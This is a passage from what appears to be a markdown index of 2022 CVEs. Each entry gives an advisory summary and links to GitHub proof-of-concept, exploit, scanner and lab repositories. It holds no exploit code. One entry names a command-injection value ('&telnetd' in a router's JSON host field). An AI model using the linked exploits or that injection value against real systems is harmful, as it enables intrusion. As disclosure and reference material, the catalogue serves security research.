`RequestmapFilterInvocationDefinition` In each case, the subclass should override the `calculateUri` method like so: ``` @Override protected String calculateUri(HttpServletRequest request) { UrlPathHelper.defaultInstance.getRequestUri(request) } ``` This should be considered a temporary measure, as the patched versions of grails-spring-security-core deprecates the `calculateUri` method. Once upgraded to a patched version of the plugin, this workaround is no longer needed. The workaround is especially important for version 2.x, as no patch is available version 2.x of the GSSC plugin. + + +- [grails/GSSC-CVE-2022-41923](https://github.com/grails/GSSC-CVE-2022-41923) + +### CVE-2022-41924 (2022-11-23) + +A vulnerability identified in the Tailscale Windows client allows a malicious website to reconfigure the Tailscale daemon `tailscaled`, which can then be used to remotely execute code. In the Tailscale Windows client, the local API was bound to a local TCP socket, and communicated with the Windows client GUI in cleartext with no Host header verification. This allowed an attacker-controlled website visited by the node to rebind DNS to an attacker-controlled DNS server, and then make local API requests in the client, including changing the coordination server to an attacker-controlled coordination server. An attacker-controlled coordination server can send malicious URL responses to the client, including pushing executables or installing an SMB share. These allow the attacker to remotely execute code on the node. All Windows clients prior to version v.1.32.3 are affected. If you are running Tailscale on Windows, upgrade to v1.32.3 or later to remediate the issue. + + +- [oalieno/CVE-2022-41924](https://github.com/oalieno/CVE-2022-41924) + +### CVE-2022-41966 (2022-12-27) + +XStream serializes Java objects to XML and back again. Versions prior to 1.4.20 may allow a remote attacker to terminate the application with a stack overflow error, resulting in a denial of service only via manipulation the processed input stream. The attack uses the hash code implementation for collections and maps to force recursive hash calculation causing a stack overflow. This issue is patched in version 1.4.20 which handles the stack overflow and raises an InputManipulationException instead. A potential workaround for users who only use HashMap or HashSet and whose XML refers these only as default map or set, is to change the default implementation of java.util.Map and java.util per the code example in the referenced advisory. However, this implies that your application does not care about the implementation of the map and all elements are comparable. + + +- [111ddea/Xstream_cve-2022-41966](https://github.com/111ddea/Xstream_cve-2022-41966) + +### CVE-2022-42045 (2023-07-13) + +Certain Zemana products are vulnerable to Arbitrary code injection. This affects Watchdog Anti-Malware 4.1.422 and Zemana AntiMalware 3.2.28. + + +- [ReCryptLLC/CVE-2022-42045](https://github.com/ReCryptLLC/CVE-2022-42045) + +### CVE-2022-42046 (2022-12-20) + +wfshbr64.sys and wfshbr32.sys specially crafted IOCTL allows arbitrary user to perform local privilege escalation + + +- [kkent030315/CVE-2022-42046](https://github.com/kkent030315/CVE-2022-42046) + +### CVE-2022-42094 (2022-11-22) + +Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the 'Card' content. + + +- [bypazs/CVE-2022-42094](https://github.com/bypazs/CVE-2022-42094) + +### CVE-2022-42095 (2022-11-23) + +Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Page content. + + +- [bypazs/CVE-2022-42095](https://github.com/bypazs/CVE-2022-42095) + +### CVE-2022-42096 (2022-11-21) + +Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via Post content. + + +- [bypazs/CVE-2022-42096](https://github.com/bypazs/CVE-2022-42096) + +### CVE-2022-42097 (2022-11-22) + +Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via 'Comment.' . + + +- [bypazs/CVE-2022-42097](https://github.com/bypazs/CVE-2022-42097) + +### CVE-2022-42098 (2022-11-22) + +KLiK SocialMediaWebsite version v1.0.1 is vulnerable to SQL Injection via the profile.php. + + +- [bypazs/CVE-2022-42098](https://github.com/bypazs/CVE-2022-42098) + +### CVE-2022-42176 (2022-10-20) + +In PCTechSoft PCSecure V5.0.8.xw, use of Hard-coded Credentials in configuration files leads to admin panel access. + + +- [soy-oreocato/CVE-2022-42176](https://github.com/soy-oreocato/CVE-2022-42176) + +### CVE-2022-42475 (2023-01-02) + +A heap-based buffer overflow vulnerability [CWE-122] in FortiOS SSL-VPN 7.2.0 through 7.2.2, 7.0.0 through 7.0.8, 6.4.0 through 6.4.10, 6.2.0 through 6.2.11, 6.0.15 and earlier and FortiProxy SSL-VPN 7.2.0 through 7.2.1, 7.0.7 and earlier may allow a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests. + + +- [bryanster/ioc-cve-2022-42475](https://github.com/bryanster/ioc-cve-2022-42475) +- [scrt/cve-2022-42475](https://github.com/scrt/cve-2022-42475) +- [Amir-hy/cve-2022-42475](https://github.com/Amir-hy/cve-2022-42475) +- [Mustafa1986/cve-2022-42475-Fortinet](https://github.com/Mustafa1986/cve-2022-42475-Fortinet) +- [3yujw7njai/CVE-2022-42475-RCE-POC](https://github.com/3yujw7njai/CVE-2022-42475-RCE-POC) +- [natceil/cve-2022-42475](https://github.com/natceil/cve-2022-42475) +- [0xhaggis/CVE-2022-42475](https://github.com/0xhaggis/CVE-2022-42475) + +### CVE-2022-42703 (2022-10-09) + +mm/rmap.c in the Linux kernel before 5.19.7 has a use-after-free related to leaf anon_vma double reuse. + + +- [Squirre17/hbp-attack-demo](https://github.com/Squirre17/hbp-attack-demo) +- [Satheesh575555/linux-4.1.15_CVE-2022-42703](https://github.com/Satheesh575555/linux-4.1.15_CVE-2022-42703) + +### CVE-2022-42864 (2022-12-15) + +A race condition was addressed with improved state handling. This issue is fixed in tvOS 16.2, macOS Monterey 12.6.2, macOS Ventura 13.1, macOS Big Sur 11.7.2, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2. An app may be able to execute arbitrary code with kernel privileges. + + +- [Muirey03/CVE-2022-42864](https://github.com/Muirey03/CVE-2022-42864) + +### CVE-2022-42889 (2022-10-13) + +Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default. + + +- [SeanWrightSec/CVE-2022-42889-PoC](https://github.com/SeanWrightSec/CVE-2022-42889-PoC) +- [chainguard-dev/text4shell-policy](https://github.com/chainguard-dev/text4shell-policy) +- [tulhan/commons-text-goat](https://github.com/tulhan/commons-text-goat) +- [karthikuj/cve-2022-42889-text4shell-docker](https://github.com/karthikuj/cve-2022-42889-text4shell-docker) +- [ClickCyber/cve-2022-42889](https://github.com/ClickCyber/cve-2022-42889) +- [korteke/CVE-2022-42889-POC](https://github.com/korteke/CVE-2022-42889-POC) +- [rockmelodies/CVE-2022-42889](https://github.com/rockmelodies/CVE-2022-42889) +- [eunomie/cve-2022-42889-check](https://github.com/eunomie/cve-2022-42889-check) +- [kljunowsky/CVE-2022-42889-text4shell](https://github.com/kljunowsky/CVE-2022-42889-text4shell) +- [securekomodo/text4shell-scan](https://github.com/securekomodo/text4shell-scan) +- [neerazz/CVE-2022-42889](https://github.com/neerazz/CVE-2022-42889) +- [uk0/cve-2022-42889-intercept](https://github.com/uk0/cve-2022-42889-intercept) +- [securekomodo/text4shell-poc](https://github.com/securekomodo/text4shell-poc) +- [humbss/CVE-2022-42889](https://github.com/humbss/CVE-2022-42889) +- [stavrosgns/Text4ShellPayloads](https://github.com/stavrosgns/Text4ShellPayloads) +- [s3l33/CVE-2022-42889](https://github.com/s3l33/CVE-2022-42889) +- [galoget/CVE-2022-42889-Text4Shell-Docker](https://github.com/galoget/CVE-2022-42889-Text4Shell-Docker) +- [rhitikwadhvana/CVE-2022-42889-Text4Shell-Exploit-POC](https://github.com/rhitikwadhvana/CVE-2022-42889-Text4Shell-Exploit-POC) +- [akshayithape-devops/CVE-2022-42889-POC](https://github.com/akshayithape-devops/CVE-2022-42889-POC) +- [0xmaximus/Apache-Commons-Text-CVE-2022-42889](https://github.com/0xmaximus/Apache-Commons-Text-CVE-2022-42889) +- [smileostrich/Text4Shell-Scanner](https://github.com/smileostrich/Text4Shell-Scanner) +- [cxzero/CVE-2022-42889-text4shell](https://github.com/cxzero/CVE-2022-42889-text4shell) +- [Vulnmachines/text4shell-CVE-2022-42889](https://github.com/Vulnmachines/text4shell-CVE-2022-42889) +- [Gotcha-1G/CVE-2022-42889](https://github.com/Gotcha-1G/CVE-2022-42889) +- [cryxnet/CVE-2022-42889-RCE](https://github.com/cryxnet/CVE-2022-42889-RCE) +- [sunnyvale-it/CVE-2022-42889-PoC](https://github.com/sunnyvale-it/CVE-2022-42889-PoC) +- [QAInsights/cve-2022-42889-jmeter](https://github.com/QAInsights/cve-2022-42889-jmeter) +- [adarshpv9746/Text4shell--Automated-exploit---CVE-2022-42889](https://github.com/adarshpv9746/Text4shell--Automated-exploit---CVE-2022-42889) +- [pwnb0y/Text4shell-exploit](https://github.com/pwnb0y/Text4shell-exploit) +- [gokul-ramesh/text4shell-exploit](https://github.com/gokul-ramesh/text4shell-exploit) +- [f0ng/text4shellburpscanner](https://github.com/f0ng/text4shellburpscanner) +- [devenes/text4shell-cve-2022-42889](https://github.com/devenes/text4shell-cve-2022-42889) +- [hotblac/text4shell](https://github.com/hotblac/text4shell) +- [necroteddy/CVE-2022-42889](https://github.com/necroteddy/CVE-2022-42889) +- [ReachabilityOrg/cve-2022-42889-text4shell-docker](https://github.com/ReachabilityOrg/cve-2022-42889-text4shell-docker) +- [dgor2023/cve-2022-42889-text4shell-docker](https://github.com/dgor2023/cve-2022-42889-text4shell-docker) +- [Dima2021/cve-2022-42889-text4shell](https://github.com/Dima2021/cve-2022-42889-text4shell) +- [aaronm-sysdig/text4shell-docker](https://github.com/aaronm-sysdig/text4shell-docker) +- [gustanini/CVE-2022-42889-Text4Shell-POC](https://github.com/gustanini/CVE-2022-42889-Text4Shell-POC) +- [Sic4rio/CVE-2022-42889](https://github.com/Sic4rio/CVE-2022-42889) +- [34006133/CVE-2022-42889](https://github.com/34006133/CVE-2022-42889) +- [DimaMend/cve-2022-42889-text4shell](https://github.com/DimaMend/cve-2022-42889-text4shell) +- [joshbnewton31080/cve-2022-42889-text4shell](https://github.com/joshbnewton31080/cve-2022-42889-text4shell) +- [MendDemo-josh/cve-2022-42889-text4shell](https://github.com/MendDemo-josh/cve-2022-42889-text4shell) + +### CVE-2022-42896 (2022-11-23) + +There are use-after-free vulnerabilities in the Linux kernel's net/bluetooth/l2cap_core.c's l2cap_connect and l2cap_le_connect_req functions which may allow code execution and leaking kernel memory (respectively) remotely via Bluetooth. A remote attacker could execute code leaking kernel memory via Bluetooth if within proximity of the victim.\n\nWe recommend upgrading past commit  https://www.google.com/url https://github.com/torvalds/linux/commit/711f8c3fb3db61897080468586b970c87c61d9e4 https://www.google.com/url \n\n + + +- [Satheesh575555/linux-4.19.72_CVE-2022-42896](https://github.com/Satheesh575555/linux-4.19.72_CVE-2022-42896) +- [hshivhare67/kernel_v4.19.72_CVE-2022-42896_old](https://github.com/hshivhare67/kernel_v4.19.72_CVE-2022-42896_old) +- [Trinadh465/linux-4.19.72_CVE-2022-42896](https://github.com/Trinadh465/linux-4.19.72_CVE-2022-42896) +- [hshivhare67/kernel_v4.19.72_CVE-2022-42896_new](https://github.com/hshivhare67/kernel_v4.19.72_CVE-2022-42896_new) +- [himanshu667/kernel_v4.19.72_CVE-2022-42896](https://github.com/himanshu667/kernel_v4.19.72_CVE-2022-42896) + +### CVE-2022-42899 (2022-10-13) + +Bentley MicroStation and MicroStation-based applications may be affected by out-of-bounds read and stack overflow issues when opening crafted SKP files. Exploiting these issues could lead to information disclosure and code execution. The fixed versions are 10.17.01.58* for MicroStation and 10.17.01.19* for Bentley View. + + +- [iamsanjay/CVE-2022-42899](https://github.com/iamsanjay/CVE-2022-42899) + +### CVE-2022-43096 (2022-11-17) + +Mediatrix 4102 before v48.5.2718 allows local attackers to gain root access via the UART port. + + +- [ProxyStaffy/Mediatrix-CVE-2022-43096](https://github.com/ProxyStaffy/Mediatrix-CVE-2022-43096) + +### CVE-2022-43097 (2022-12-05) + +Phpgurukul User Registration & User Management System v3.0 was discovered to contain multiple stored cross-site scripting (XSS) vulnerabilities via the firstname and lastname parameters of the registration form & login pages. + + +- [nibin-m/CVE-2022-43097](https://github.com/nibin-m/CVE-2022-43097) + +### CVE-2022-43117 (2022-11-21) + +Sourcecodester Password Storage Application in PHP/OOP and MySQL 1.0 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities via the Name, Username, Description and Site Feature parameters. + + +- [RashidKhanPathan/CVE-2022-43117](https://github.com/RashidKhanPathan/CVE-2022-43117) + +### CVE-2022-43143 (2022-11-21) + +A cross-site scripting (XSS) vulnerability in Beekeeper Studio v3.6.6 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the error modal container. + + +- [goseungduk/beekeeper](https://github.com/goseungduk/beekeeper) + +### CVE-2022-43144 (2022-11-08) + +A cross-site scripting (XSS) vulnerability in Canteen Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. + + +- [mudassiruddin/CVE-2022-43144-Stored-XSS](https://github.com/mudassiruddin/CVE-2022-43144-Stored-XSS) + +### CVE-2022-43271 (2022-12-22) + +Inhabit Systems Pty Ltd Move CRM version 4, build 260 was discovered to contain a cross-site scripting (XSS) vulnerability via the User profile component. + + +- [SecurityWillCheck/CVE-2022-43271](https://github.com/SecurityWillCheck/CVE-2022-43271) + +### CVE-2022-43293 (2023-04-11) + +Wacom Driver 6.3.46-1 for Windows was discovered to contain an arbitrary file write vulnerability via the component \Wacom\Wacom_Tablet.exe. + + +- [LucaBarile/CVE-2022-43293](https://github.com/LucaBarile/CVE-2022-43293) + +### CVE-2022-43332 (2022-11-17) + +A cross-site scripting (XSS) vulnerability in Wondercms v3.3.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Site title field of the Configuration Panel. + + +- [maikroservice/CVE-2022-43332](https://github.com/maikroservice/CVE-2022-43332) + +### CVE-2022-43343 (2022-11-08) + +N-Prolog v1.91 was discovered to contain a global buffer overflow vulnerability in the function gettoken() at Main.c. + + +- [Halcy0nic/CVE-2022-43343](https://github.com/Halcy0nic/CVE-2022-43343) + +### CVE-2022-43369 (2022-12-06) + +AutoTaxi Stand Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component search.php. + + +- [sudoninja-noob/CVE-2022-43369](https://github.com/sudoninja-noob/CVE-2022-43369) + +### CVE-2022-43571 (2022-11-03) + +In Splunk Enterprise versions below 8.2.9, 8.1.12, and 9.0.2, an authenticated user can execute arbitrary code through the dashboard PDF generation component.\n\n + + +- [ohnonoyesyes/CVE-2022-43571](https://github.com/ohnonoyesyes/CVE-2022-43571) + +### CVE-2022-43680 (2022-10-24) + +In libexpat through 2.4.9, there is a use-after free caused by overeager destruction of a shared DTD in XML_ExternalEntityParserCreate in out-of-memory situations. + + +- [Trinadh465/external_expat-2.1.0_CVE-2022-43680](https://github.com/Trinadh465/external_expat-2.1.0_CVE-2022-43680) +- [nidhihcl/external_expat_2.1.0_CVE-2022-43680](https://github.com/nidhihcl/external_expat_2.1.0_CVE-2022-43680) + +### CVE-2022-43704 (2023-01-20) + +The Sinilink XY-WFT1 WiFi Remote Thermostat, running firmware 1.3.6, allows an attacker to bypass the intended requirement to communicate using MQTT. It is possible to replay Sinilink aka SINILINK521 protocol (udp/1024) commands interfacing directly with the target device. This, in turn, allows for an attack to control the onboard relay without requiring authentication via the mobile application. This might result in an unacceptable temperature within the target device's physical environment. + + +- [9lyph/CVE-2022-43704](https://github.com/9lyph/CVE-2022-43704) + +### CVE-2022-43959 (2023-01-20) + +Insufficiently Protected Credentials in the AD/LDAP server settings in 1C-Bitrix Bitrix24 through 22.200.200 allow remote administrators to discover an AD/LDAP administrative password by reading the source code of /bitrix/admin/ldap_server_edit.php. + + +- [secware-ru/CVE-2022-43959](https://github.com/secware-ru/CVE-2022-43959) + +### CVE-2022-43980 (2023-01-27) + +There is a stored cross-site scripting vulnerability in Pandora FMS v765 in the network maps editing functionality. An attacker could modify a network map, including on purpose the name of an XSS payload. Once created, if a user with admin privileges clicks on the edited network maps, the XSS payload will be executed. The exploitation of this vulnerability could allow an atacker to steal the value of the admin user´s cookie. + + +- [Argonx21/CVE-2022-43980](https://github.com/Argonx21/CVE-2022-43980) + +### CVE-2022-44118 (2022-11-23) + +dedecmdv6 v6.1.9 is vulnerable to Remote Code Execution (RCE) via file_manage_control.php. + + +- [Athishpranav2003/CVE-2022-44118-Exploit](https://github.com/Athishpranav2003/CVE-2022-44118-Exploit) + +### CVE-2022-44136 (2022-11-30) + +Zenario CMS 9.3.57186 is vulnerable to Remote Code Excution (RCE). + + +- [IgorDuino/CVE-2022-44136-exploit](https://github.com/IgorDuino/CVE-2022-44136-exploit) + +### CVE-2022-44149 (2023-01-06) + +The web service on Nexxt Amp300 ARN02304U8 42.103.1.5095 and 80.103.2.5045 devices allows remote OS command execution by placing &telnetd in the JSON host field to the ping feature of the goform/sysTools component. Authentication is required + + +- [yerodin/CVE-2022-44149](https://github.com/yerodin/CVE-2022-44149) +- [geniuszly/CVE-2022-44149](https://github.com/geniuszly/CVE-2022-44149) + +### CVE-2022-44183 (2022-11-21) + +Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function formSetWifiGuestBasic. + + +- [flagqaz/CVE-2022-44183](https://github.com/flagqaz/CVE-2022-44183) + +### CVE-2022-44215 (2023-08-22) + +There is an open redirect vulnerability in Titan FTP server 19.0 and below. Users are redirected to any target URL. + + +- [JBalanza/CVE-2022-44215](https://github.com/JBalanza/CVE-2022-44215) + +### CVE-2022-44268 (2023-02-06) + +ImageMagick 7.1.0-49 is vulnerable to Information Disclosure. When it parses a PNG image (e.g., for resize), the resulting image could have embedded the content of an arbitrary. file (if the magick binary has permissions to read it). + + +- [duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC](https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC) +- [y1nglamore/CVE-2022-44268-ImageMagick-Vulnerable-Docker-Environment](https://github.com/y1nglamore/CVE-2022-44268-ImageMagick-Vulnerable-Docker-Environment) +- [agathanon/cve-2022-44268](https://github.com/agathanon/cve-2022-44268) +- [jnschaeffer/cve-2022-44268-detector](https://github.com/jnschaeffer/cve-2022-44268-detector) +- [Ashifcoder/CVE-2022-44268-automated-poc](https://github.com/Ashifcoder/CVE-2022-44268-automated-poc) +- [Baikuya/CVE-2022-44268-PoC](https://github.com/Baikuya/CVE-2022-44268-PoC) +- [voidz0r/CVE-2022-44268](https://github.com/voidz0r/CVE-2022-44268) +- [Sybil-Scan/imagemagick-lfi-poc](https://github.com/Sybil-Scan/imagemagick-lfi-poc) +- [Vulnmachines/imagemagick-CVE-2022-44268](https://github.com/Vulnmachines/imagemagick-CVE-2022-44268) +- [kljunowsky/CVE-2022-44268](https://github.com/kljunowsky/CVE-2022-44268) +- [nfm/heroku-CVE-2022-44268-reproduction](https://github.com/nfm/heroku-CVE-2022-44268-reproduction) +- [betillogalvanfbc/POC-CVE-2022-44268](https://github.com/betillogalvanfbc/POC-CVE-2022-44268) +- [adhikara13/CVE-2022-44268-MagiLeak](https://github.com/adhikara13/CVE-2022-44268-MagiLeak) +- [bhavikmalhotra/CVE-2022-44268-Exploit](https://github.com/bhavikmalhotra/CVE-2022-44268-Exploit) +- [entr0pie/CVE-2022-44268](https://github.com/entr0pie/CVE-2022-44268) +- [Pog-Frog/cve-2022-44268](https://github.com/Pog-Frog/cve-2022-44268) +- [narekkay/auto-cve-2022-44268.sh](https://github.com/narekkay/auto-cve-2022-44268.sh) +- [fanbyprinciple/ImageMagick-lfi-poc](https://github.com/fanbyprinciple/ImageMagick-lfi-poc) +- [chairat095/CVE-2022-44268_By_Kyokito](https://github.com/chairat095/CVE-2022-44268_By_Kyokito) +- [atici/Exploit-for-ImageMagick-CVE-2022-44268](https://github.com/atici/Exploit-for-ImageMagick-CVE-2022-44268) +- [Vagebondcur/IMAGE-MAGICK-CVE-2022-44268](https://github.com/Vagebondcur/IMAGE-MAGICK-CVE-2022-44268) +- [NataliSemi/-CVE-2022-44268](https://github.com/NataliSemi/-CVE-2022-44268) +- [CygnusX-26/CVE-2022-44268-fixed-PoC](https://github.com/CygnusX-26/CVE-2022-44268-fixed-PoC) +- [PanAdamski/CVE-2022-44268-automated](https://github.com/PanAdamski/CVE-2022-44268-automated) +- [FlojBoj/CVE-2022-44268](https://github.com/FlojBoj/CVE-2022-44268) + +### CVE-2022-44276 (2023-06-28) + +In Responsive Filemanager < 9.12.0, an attacker can bypass upload restrictions resulting in RCE. + + +- [HerrLeStrate/CVE-2022-44276-PoC](https://github.com/HerrLeStrate/CVE-2022-44276-PoC) + +### CVE-2022-44311 (2022-11-08) + +html2xhtml v1.3 was discovered to contain an Out-Of-Bounds read in the function static void elm_close(tree_node_t *nodo) at procesador.c. This vulnerability allows attackers to access sensitive files or cause a Denial of Service (DoS) via a crafted html file. + + +- [Halcy0nic/CVE-2022-44311](https://github.com/Halcy0nic/CVE-2022-44311) +- [DesmondSanctity/CVE-2022-44311](https://github.com/DesmondSanctity/CVE-2022-44311) + +### CVE-2022-44312 (2022-11-08) + +PicoC Version 3.2.2 was discovered to contain a heap buffer overflow in the ExpressionCoerceInteger function in expression.c when called from ExpressionInfixOperator. + + +- [Halcy0nic/CVEs-for-picoc-3.2.2](https://github.com/Halcy0nic/CVEs-for-picoc-3.2.2) + +### CVE-2022-44318 (2022-11-08) + +PicoC Version 3.2.2 was discovered to contain a heap buffer overflow in the StringStrcat function in cstdlib/string.c when called from ExpressionParseFunctionCall. + + +- [Halcy0nic/CVE-2022-44318](https://github.com/Halcy0nic/CVE-2022-44318) + +### CVE-2022-44569 (2023-11-03) + +A locally authenticated attacker with low privileges can bypass authentication due to insecure inter-process communication. + + +- [rweijnen/ivanti-automationmanager-exploit](https://github.com/rweijnen/ivanti-automationmanager-exploit) + +### CVE-2022-44666 (2022-12-13) + +Windows Contacts Remote Code Execution Vulnerability + + +- [j00sean/CVE-2022-44666](https://github.com/j00sean/CVE-2022-44666) + +### CVE-2022-44721 +- [gmh5225/CVE-2022-44721-CsFalconUninstaller](https://github.com/gmh5225/CVE-2022-44721-CsFalconUninstaller) + +### CVE-2022-44789 (2022-11-23) + +A logical issue in O_getOwnPropertyDescriptor() in Artifex MuJS 1.0.0 through 1.3.x before 1.3.2 allows an attacker to achieve Remote Code Execution through memory corruption, via the loading of a crafted JavaScript file. + + +- [alalng/CVE-2022-44789](https://github.com/alalng/CVE-2022-44789) + +### CVE-2022-44830 (2022-11-21) + +Sourcecodester Event Registration App v1.0 was discovered to contain multiple CSV injection vulnerabilities via the First Name, Contact and Remarks fields. These vulnerabilities allow attackers to execute arbitrary code via a crafted excel file. + + +- [RashidKhanPathan/CVE-2022-44830](https://github.com/RashidKhanPathan/CVE-2022-44830) + +### CVE-2022-44870 (2023-01-06) + +A reflected cross-site scripting (XSS) vulnerability in maccms10 v2022.1000.3032 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter under the AD Management module. + + +- [Cedric1314/CVE-2022-44870](https://github.com/Cedric1314/CVE-2022-44870) + +### CVE-2022-44875 (2023-03-06) + +KioWare through 8.33 on Windows sets KioScriptingUrlACL.AclActions.AllowHigh for the about:blank origin, which allows attackers to obtain SYSTEM access via KioUtils.Execute in JavaScript code. + + +- [AesirSec/CVE-2022-44875-Test](https://github.com/AesirSec/CVE-2022-44875-Test) + +### CVE-2022-44877 (2023-01-05) + +login/index.php in CWP (aka Control Web Panel or CentOS Web Panel) 7 before 0.9.8.1147 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the login parameter. + + +- [numanturle/CVE-2022-44877](https://github.com/numanturle/CVE-2022-44877) +- [komomon/CVE-2022-44877-RCE](https://github.com/komomon/CVE-2022-44877-RCE) +- [ColdFusionX/CVE-2022-44877-CWP7](https://github.com/ColdFusionX/CVE-2022-44877-CWP7) +- [Chocapikk/CVE-2022-44877](https://github.com/Chocapikk/CVE-2022-44877) +- [hotpotcookie/CVE-2022-44877-white-box](https://github.com/hotpotcookie/CVE-2022-44877-white-box) +- [RicYaben/CVE-2022-44877-LAB](https://github.com/RicYaben/CVE-2022-44877-LAB) +- [dkstar11q/CVE-2022-44877](https://github.com/dkstar11q/CVE-2022-44877) +- [rhymsc/CVE-2022-44877-RCE](https://github.com/rhymsc/CVE-2022-44877-RCE) +- [G01d3nW01f/CVE-2022-44877](https://github.com/G01d3nW01f/CVE-2022-44877) + +### CVE-2022-44900 (2022-12-06) + +A directory traversal vulnerability in the SevenZipFile.extractall() function of the python library py7zr v0.20.0 and earlier allows attackers to write arbitrary files via extracting a crafted 7z file. + + +- [0xless/CVE-2022-44900-demo-lab](https://github.com/0xless/CVE-2022-44900-demo-lab) + +### CVE-2022-45003 (2023-03-22) + +Gophish through 0.12.1 allows attackers to cause a Denial of Service (DoS) via a crafted payload involving autofocus. + + +- [mha98/CVE-2022-45003](https://github.com/mha98/CVE-2022-45003) + +### CVE-2022-45004 (2023-03-22) + +Gophish through 0.12.1 was discovered to contain a cross-site scripting (XSS) vulnerability via a crafted landing page. + + +- [mha98/CVE-2022-45004](https://github.com/mha98/CVE-2022-45004) + +### CVE-2022-45025 (2022-12-07) + +Markdown Preview Enhanced v0.6.5 and v0.19.6 for VSCode and Atom was discovered to contain a command injection vulnerability via the PDF file import function. + + +- [yuriisanin/CVE-2022-45025](https://github.com/yuriisanin/CVE-2022-45025) +- [andyhsu024/CVE-2022-45025](https://github.com/andyhsu024/CVE-2022-45025) + +### CVE-2022-45047 (2022-11-16) + +Class org.apache.sshd.server.keyprovider.SimpleGeneratorHostKeyProvider in Apache MINA SSHD <= 2.9.1 uses Java deserialization to load a serialized java.security.PrivateKey. The class is one of several implementations that an implementor using Apache MINA SSHD can choose for loading the host keys of an SSH server. + + +- [hktalent/CVE-2022-45047](https://github.com/hktalent/CVE-2022-45047) + +### CVE-2022-45059 (2022-11-09) + +An issue was discovered in Varnish Cache 7.x before 7.1.2 and 7.2.x before 7.2.1. A request smuggling attack can be performed on Varnish Cache servers by requesting that certain headers are made hop-by-hop, preventing the Varnish Cache servers from forwarding critical headers to the backend. + + +- [martinvks/CVE-2022-45059-demo](https://github.com/martinvks/CVE-2022-45059-demo) + +### CVE-2022-45217 (2022-12-07) + +A cross-site scripting (XSS) vulnerability in Book Store Management System v1.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Level parameter under the Add New System User module. + + +- [sudoninja-noob/CVE-2022-45217](https://github.com/sudoninja-noob/CVE-2022-45217) + +### CVE-2022-45265 +- [maikroservice/CVE-2022-45265](https://github.com/maikroservice/CVE-2022-45265) + +### CVE-2022-45299 (2023-01-13) + +An issue in the IpFile argument of rust-lang webbrowser-rs v0.8.2 allows attackers to access arbitrary files via supplying a crafted URL. + + +- [offalltn/CVE-2022-45299](https://github.com/offalltn/CVE-2022-45299) + +### CVE-2022-45354 (2024-01-08) + +Exposure of Sensitive Information to an Unauthorized Actor vulnerability in WPChill Download Monitor.This issue affects Download Monitor: from n/a through 4.7.60.\n\n + + +- [RandomRobbieBF/CVE-2022-45354](https://github.com/RandomRobbieBF/CVE-2022-45354) + +### CVE-2022-45436 (2023-02-15) + +Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Artica PFMS Pandora FMS v765 on all platforms, allows Cross-Site Scripting (XSS). As a manager privilege user , create a network map containing name as xss payload. Once created, admin user must click on the edit network maps and XSS payload will be executed, which could be used for stealing admin users cookie value.\n\n + + +- [damodarnaik/CVE-2022-45436](https://github.com/damodarnaik/CVE-2022-45436) + +### CVE-2022-45451 (2023-08-31) + +Local privilege escalation due to insecure driver communication port permissions. The following products are affected: Acronis Cyber Protect Home Office (Windows) before build 40173, Acronis Agent (Windows) before build 30600, Acronis Cyber Protect 15 (Windows) before build 30984. + + +- [alfarom256/CVE-2022-45451](https://github.com/alfarom256/CVE-2022-45451) + +### CVE-2022-45472 (2022-11-23) + +CAE LearningSpace Enterprise (with Intuity License) image 267r patch 639 allows DOM XSS, related to ontouchmove and onpointerup. + + +- [nicbrinkley/CVE-2022-45472](https://github.com/nicbrinkley/CVE-2022-45472) + +### CVE-2022-45477 (2022-12-05) + +Telepad allows remote unauthenticated users to send instructions to the server to execute arbitrary code without any previous authorization or authentication. CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + + +- [M507/nmap-vulnerability-scan-scripts](https://github.com/M507/nmap-vulnerability-scan-scripts) + +### CVE-2022-45511 (2022-12-08) + +Tenda W30E V1.0.1.25(633) was discovered to contain a stack overflow via the PPPOEPassword parameter at /goform/QuickIndex. + + +- [kinderscsaa/cve-2022-45511](https://github.com/kinderscsaa/cve-2022-45511) + +### CVE-2022-45544 (2023-02-07) + +Insecure Permission vulnerability in Schlix Web Inc SCHLIX CMS 2.2.7-2 allows attacker to upload arbitrary files and execute arbitrary code via the tristao parameter. NOTE: this is disputed by the vendor because an admin is intentionally allowed to upload new executable PHP code, such as a theme that was obtained from a trusted source or was developed for their own website. Only an admin can upload such code, not someone else in an "attacker" role. + + +- [tristao-marinho/CVE-2022-45544](https://github.com/tristao-marinho/CVE-2022-45544) + +### CVE-2022-45599 (2023-02-22) + +Aztech WMB250AC Mesh Routers Firmware Version 016 2020 is vulnerable to PHP Type Juggling in file /var/www/login.php, allows attackers to gain escalated privileges only when specific conditions regarding a given accounts hashed password. + + +- [ethancunt/CVE-2022-45599](https://github.com/ethancunt/CVE-2022-45599) + +### CVE-2022-45600 (2023-02-22) + +Aztech WMB250AC Mesh Routers Firmware 